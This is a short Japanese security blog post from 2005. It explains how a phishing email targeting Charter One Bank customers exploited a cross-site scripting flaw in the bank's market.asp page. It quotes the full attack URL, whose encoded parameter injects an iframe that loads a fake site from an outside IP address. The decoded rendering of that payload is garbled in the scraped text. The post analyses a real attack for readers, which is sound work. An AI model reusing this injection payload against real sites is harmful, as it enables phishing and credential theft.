クロスサイトスクリプティング

今年5月に出回ったCharter One Bankのフィッシングは、クロスサイトスクリプティングの脆弱性を悪用したものだった。

「Account Error」と題されたメールには次のようなリンクがある。www.charterone.comはCharter One Bankの本物のサイト。

http://www.charterone.com/cards/market.asp?code=%22%3E%3Ciframe+style%3D%22top%3A0%3B+left%3A0%3B+position%3Aabsolute%3B%22+FRAMEBORDER%3D%220%22+BORDER%3D%220%22+width%3D1000+height%3D600+src%3D%22http%3A%2F%2F62.193.220.52/charter%2F%22%3E

パーセントエンコーディングされている部分をデコーディングすると、

"></p><p>となり、market.aspにパラメータとしてIFRAME要素を渡していることがわかる。market.aspは、これを適切に処理せず、利用者のブラウザにそのまま渡してしまう。その結果、src属性に設定された偽サイトのコンテンツが表示される。</p><p><img src="https://d.hatena.ne.jp/images/diary/hoshizawa/2005-01-05.png"></p> </div> <footer class="entry-footer"> <div class="entry-tags-wrapper"> <div class="entry-tags"> </div> </div> <p class="entry-footer-section track-inview-by-gtm" data-gtm-track-json="{"area": "finish_reading"}"> <span class="author vcard"><span class="fn" data-load-nickname="1" data-user-name="hoshizawa" >hoshizawa</span></span> <span class="entry-footer-time"><a href="https://hoshizawa.hatenadiary.org/entry/20051123/p1"><time data-relative datetime="2005-11-22T15:00:00Z" title="2005-11-22T15:00:00Z" class="updated">2005-11-23 00:00</time></a></span> <span class=" entry-footer-subscribe " data-test-blog-controlls-subscribe> <a href="https://blog.hatena.ne.jp/hoshizawa/hoshizawa.hatenadiary.org/subscribe?utm_medium=button&utm_campaign=subscribe_blog&utm_source=blogs_entry_footer"> 読者になる </a> </span> </p> <div class="hatena-star-container" data-hatena-star-container data-hatena-star-url="https://hoshizawa.hatenadiary.org/entry/20051123/p1" data-hatena-star-title="クロスサイトスクリプティング" data-hatena-star-variant="profile-icon" data-hatena-star-profile-url-template="https://blog.hatena.ne.jp/{username}/" ></div> <div class="social-buttons"> <div class="social-button-item"> <a href="https://b.hatena.ne.jp/entry/s/hoshizawa.hatenadiary.org/entry/20051123/p1" class="hatena-bookmark-button" data-hatena-bookmark-url="https://hoshizawa.hatenadiary.org/entry/20051123/p1" data-hatena-bookmark-layout="vertical-balloon" data-hatena-bookmark-lang="ja" title="この記事をはてなブックマークに追加"><img src="https://b.st-hatena.com/images/entry-button/button-only.gif" alt="この記事をはてなブックマークに追加" width="20" height="20" style="border: none;" /></a> </div> <div class="social-button-item"> <div class="fb-share-button" data-layout="box_count" data-href="https://hoshizawa.hatenadiary.org/entry/20051123/p1"></div> </div> <div class="social-button-item"> <a class="entry-share-button entry-share-button-twitter test-share-button-twitter" href="https://twitter.com/intent/tweet?text=%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0+-+%E6%98%9F%E6%BE%A4%E8%A3%95%E4%BA%8C%E3%83%A1%E3%83%A2&url=https%3A%2F%2Fhoshizawa.hatenadiary.org%2Fentry%2F20051123%2Fp1" title="X（Twitter）で投稿する" ></a> </div> </div> <div class="google-afc-image test-google-rectangle-ads"> <div id="google_afc_user_container_1" class="google-afc-user-container google_afc_blocklink2_5 google_afc_boder" data-test-unit="/4374287/blog_user"></div> <a href="http://blog.hatena.ne.jp/guide/pro" class="open-pro-modal" data-guide-pro-modal-ad-url="https://hatena.blog/guide/pro/modal/ad">広告を非表示にする</a> </div> <div class="customized-footer"> <div class="entry-footer-modules" id="entry-footer-secondary-modules"> </div> </div> <div class="comment-box js-comment-box"> <ul class="comment js-comment"> <li class="read-more-comments" style="display: none;"><a>もっと読む</a></li> </ul> <a class="leave-comment-title js-leave-comment-title">コメントを書く</a> </div> </footer> </div> </article>   <div class="pager pager-permalink permalink"> <span class="pager-prev"> <a href="https://hoshizawa.hatenadiary.org/entry/20051123/p2" rel="prev"> <span class="pager-arrow">« </span> メモ </a> </span> <span class="pager-next"> <a href="https://hoshizawa.hatenadiary.org/entry/20051122/p1" rel="next"> Black Hat Japan 2005 - クロスサイトスク… <span class="pager-arrow"> »</span> </a> </span> </div> </div> </div> <aside id="box1"> <div id="box1-inner"> </div> </aside> </div> <aside id="box2"> <div id="box2-inner"> <div class="hatena-module hatena-module-profile"> <div class="hatena-module-title"> プロフィール </div> <div class="hatena-module-body"> <a href="https://hoshizawa.hatenadiary.org/about" class="profile-icon-link"> <img src="https://cdn.profile-image.st-hatena.com/users/hoshizawa/profile.png" alt="id:hoshizawa" class="profile-icon" /> </a> <span class="id"> <a href="https://hoshizawa.hatenadiary.org/about" class="hatena-id-link"><span data-load-nickname="1" data-user-name="hoshizawa">id:hoshizawa</span></a> </span> <div class="hatena-follow-button-box btn-subscribe js-hatena-follow-button-box" > <a href="#" class="hatena-follow-button js-hatena-follow-button"> <span class="subscribing"> <span class="foreground">読者です</span> <span class="background">読者をやめる</span> </span> <span class="unsubscribing" data-track-name="profile-widget-subscribe-button" data-track-once> <span class="foreground">読者になる</span> <span class="background">読者になる</span> </span> </a> <div class="subscription-count-box js-subscription-count-box"> <i></i> <u></u> <span class="subscription-count js-subscription-count"> </span> </div> </div> <div class="profile-about"> <a href="https://hoshizawa.hatenadiary.org/about">このブログについて</a> </div> </div> </div> <div class="hatena-module hatena-module-search-box"> <div class="hatena-module-title"> 検索 </div> <div class="hatena-module-body"> <form class="search-form" role="search" action="https://hoshizawa.hatenadiary.org/search" method="get"> <input type="text" name="q" class="search-module-input" value="" placeholder="記事を検索" required> <input type="submit" value="検索" class="search-module-button" /> </form> </div> </div> <div class="hatena-module hatena-module-links"> <div class="hatena-module-title"> リンク </div> <div class="hatena-module-body"> <ul class="hatena-urllist"> <li> <a href="https://hatena.blog/">はてなブログ</a> </li> <li> <a href="https://hatena.blog/guide?via=200109">ブログをはじめる</a> </li> <li> <a href="http://blog.hatenablog.com">週刊はてなブログ</a> </li> <li> <a href="https://hatena.blog/guide/pro">はてなブログPro</a> </li> </ul> </div> </div> <div class="hatena-module hatena-module-recent-entries "> <div class="hatena-module-title"> <a href="https://hoshizawa.hatenadiary.org/archive"> 最新記事 </a> </div> <div class="hatena-module-body"> <ul class="recent-entries hatena-urllist "> <li class="urllist-item recent-entries-item"> <div class="urllist-item-inner recent-entries-item-inner"> <a href="https://hoshizawa.hatenadiary.org/entry/20051221/p1" class="urllist-title-link recent-entries-title-link urllist-title recent-entries-title">星澤裕二のSecurityWatch</a> </div> </li> <li class="urllist-item recent-entries-item"> <div class="urllist-item-inner recent-entries-item-inner"> <a href="https://hoshizawa.hatenadiary.org/entry/20051213/p1" class="urllist-title-link recent-entries-title-link urllist-title recent-entries-title">引っ越し</a> </div> </li> <li class="urllist-item recent-entries-item"> <div class="urllist-item-inner recent-entries-item-inner"> <a href="https://hoshizawa.hatenadiary.org/entry/20051212/p1" class="urllist-title-link recent-entries-title-link urllist-title recent-entries-title">Evil Twins</a> </div> </li> <li class="urllist-item recent-entries-item"> <div class="urllist-item-inner recent-entries-item-inner"> <a href="https://hoshizawa.hatenadiary.org/entry/20051211/p1" class="urllist-title-link recent-entries-title-link urllist-title recent-entries-title">フィッシングの歴史</a> </div> </li> <li class="urllist-item recent-entries-item"> <div class="urllist-item-inner recent-entries-item-inner"> <a href="https://hoshizawa.hatenadiary.org/entry/20051210/p1" class="urllist-title-link recent-entries-title-link urllist-title recent-entries-title">メモ</a> </div> </li> </ul> </div> </div> <div class="hatena-module hatena-module-archive" data-archive-type="default" data-archive-url="https://hoshizawa.hatenadiary.org/archive"> <div class="hatena-module-title"> <a href="https://hoshizawa.hatenadiary.org/archive">月別アーカイブ</a> </div> <div class="hatena-module-body"> <ul class="hatena-urllist"> <li class="archive-module-year archive-module-year-hidden" data-year="2005"> <div class="archive-module-button"> <span class="archive-module-hide-button">▼</span> <span class="archive-module-show-button">▶</span> </div> <a href="https://hoshizawa.hatenadiary.org/archive/2005" class="archive-module-year-title archive-module-year-2005"> 2005 </a> <ul class="archive-module-months"> <li class="archive-module-month"> <a href="https://hoshizawa.hatenadiary.org/archive/2005/12" class="archive-module-month-title archive-module-month-2005-12"> 2005 / 12 </a> </li> <li class="archive-module-month"> <a href="https://hoshizawa.hatenadiary.org/archive/2005/11" class="archive-module-month-title archive-module-month-2005-11"> 2005 / 11 </a> </li> <li class="archive-module-month"> <a href="https://hoshizawa.hatenadiary.org/archive/2005/10" class="archive-module-month-title archive-module-month-2005-10"> 2005 / 10 </a> </li> <li class="archive-module-month"> <a href="https://hoshizawa.hatenadiary.org/archive/2005/09" class="archive-module-month-title archive-module-month-2005-9"> 2005 / 9 </a> </li> <li class="archive-module-month"> <a href="https://hoshizawa.hatenadiary.org/archive/2005/08" class="archive-module-month-title archive-module-month-2005-8"> 2005 / 8 </a> </li> <li class="archive-module-month"> <a href="https://hoshizawa.hatenadiary.org/archive/2005/02" class="archive-module-month-title archive-module-month-2005-2"> 2005 / 2 </a> </li> <li class="archive-module-month"> <a href="https://hoshizawa.hatenadiary.org/archive/2005/01" class="archive-module-month-title archive-module-month-2005-1"> 2005 / 1 </a> </li> </ul> </li> </ul> </div> </div> </div> </aside> </div> </div> </div> </div> <footer id="footer" data-brand="hatenablog"> <div id="footer-inner"> <div style="display:none !important" class="guest-footer js-guide-register test-blogs-register-guide" data-action="guide-register"> <div class="guest-footer-content"> <h3>はてなブログをはじめよう！</h3> <p>hoshizawaさんは、はてなブログを使っています。あなたもはてなブログをはじめてみませんか？</p> <div class="guest-footer-btn-container"> <div class="guest-footer-btn"> <a class="btn btn-register js-inherit-ga" href="https://blog.hatena.ne.jp/register?via=200227" target="_blank">はてなブログをはじめる（無料）</a> </div> <div class="guest-footer-btn"> <a href="https://hatena.blog/guide" target="_blank">はてなブログとは</a> </div> </div> </div> </div> <address class="footer-address"> <a href="https://hoshizawa.hatenadiary.org/"> <img src="https://cdn.blog.st-hatena.com/images/admin/blog-icon-noimage.png" width="16" height="16" alt="星澤裕二メモ"/> <span class="footer-address-name">星澤裕二メモ</span> </a> </address> <p class="services"> Powered by <a href="https://hatena.blog/">Hatena Blog</a> | <a href="https://blog.hatena.ne.jp/-/abuse_report?target_url=https%3A%2F%2Fhoshizawa.hatenadiary.org%2Fentry%2F20051123%2Fp1" class="report-abuse-link test-report-abuse-link" target="_blank">ブログを報告する</a> </p> </div> </footer> <script async src="https://s.hatena.ne.jp/js/widget/star.js"></script> <script> if (typeof window.Hatena === 'undefined') { window.Hatena = {}; } if (!Hatena.hasOwnProperty('Star')) { Hatena.Star = { VERSION: 2, }; } </script> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/ja_JP/sdk.js#xfbml=1&appId=719729204785177&version=v17.0"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="quote-box"> <div class="tooltip-quote tooltip-quote-stock"> <i class="blogicon-quote" title="引用をストック"></i> </div> <div class="tooltip-quote tooltip-quote-tweet js-tooltip-quote-tweet"> <a class="js-tweet-quote" target="_blank" data-track-name="quote-tweet" data-track-once> <img src="https://cdn.blog.st-hatena.com/images/admin/quote/quote-x-icon.svg?version=ee7d6f7116d9cbc8c1749752032c62" title="引用して投稿する" > </a> </div> </div> <div class="quote-stock-panel" id="quote-stock-message-box" style="position: absolute; z-index: 3000"> <div class="message-box" id="quote-stock-succeeded-message" style="display: none"> <p>引用をストックしました</p> <button class="btn btn-primary" id="quote-stock-show-editor-button" data-track-name="curation-quote-edit-button">ストック一覧を見る</button> <button class="btn quote-stock-close-message-button">閉じる</button> </div> <div class="message-box" id="quote-login-required-message" style="display: none"> <p>引用するにはまずログインしてください</p> <button class="btn btn-primary" id="quote-login-button">ログイン</button> <button class="btn quote-stock-close-message-button">閉じる</button> </div> <div class="error-box" id="quote-stock-failed-message" style="display: none"> <p>引用をストックできませんでした。再度お試しください</p> <button class="btn quote-stock-close-message-button">閉じる</button> </div> <div class="error-box" id="unstockable-quote-message-box" style="display: none; position: absolute; z-index: 3000;"> <p>限定公開記事のため引用できません。</p> </div> </div> <script type="x-underscore-template" id="js-requote-button-template"> <div class="requote-button js-requote-button"> <button class="requote-button-btn tipsy-top" title="引用する"><i class="blogicon-quote"></i></button> </div> </script> <div id="hidden-subscribe-button" style="display: none;"> <div class="hatena-follow-button-box btn-subscribe js-hatena-follow-button-box" > <a href="#" class="hatena-follow-button js-hatena-follow-button"> <span class="subscribing"> <span class="foreground">読者です</span> <span class="background">読者をやめる</span> </span> <span class="unsubscribing" data-track-name="profile-widget-subscribe-button" data-track-once> <span class="foreground">読者になる</span> <span class="background">読者になる</span> </span> </a> <div class="subscription-count-box js-subscription-count-box"> <i></i> <u></u> <span class="subscription-count js-subscription-count"> </span> </div> </div> </div> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> <script src="https://b.st-hatena.com/js/bookmark_button.js" charset="utf-8" async="async"></script> <script type="text/javascript" src="https://cdn.blog.st-hatena.com/js/external/jquery.min.js?v=1.12.4&version=ee7d6f7116d9cbc8c1749752032c62"></script> <script src="https://cdn.blog.st-hatena.com/js/texts-ja.js?version=ee7d6f7116d9cbc8c1749752032c62"></script> <script id="vendors-js" data-env="production" src="https://cdn.blog.st-hatena.com/js/vendors.js?version=ee7d6f7116d9cbc8c1749752032c62" crossorigin="anonymous"></script> <script id="hatenablog-js" data-env="production" src="https://cdn.blog.st-hatena.com/js/hatenablog.js?version=ee7d6f7116d9cbc8c1749752032c62" crossorigin="anonymous" data-page-id="entry"></script> <script>Hatena.Diary.GlobalHeader.init()</script> <script id="valve-dmp" data-service="blog" src="https://cdn.pool.st-hatena.com/valve/dmp.js" data-test-id="dmpjs" async></script> </body> </html>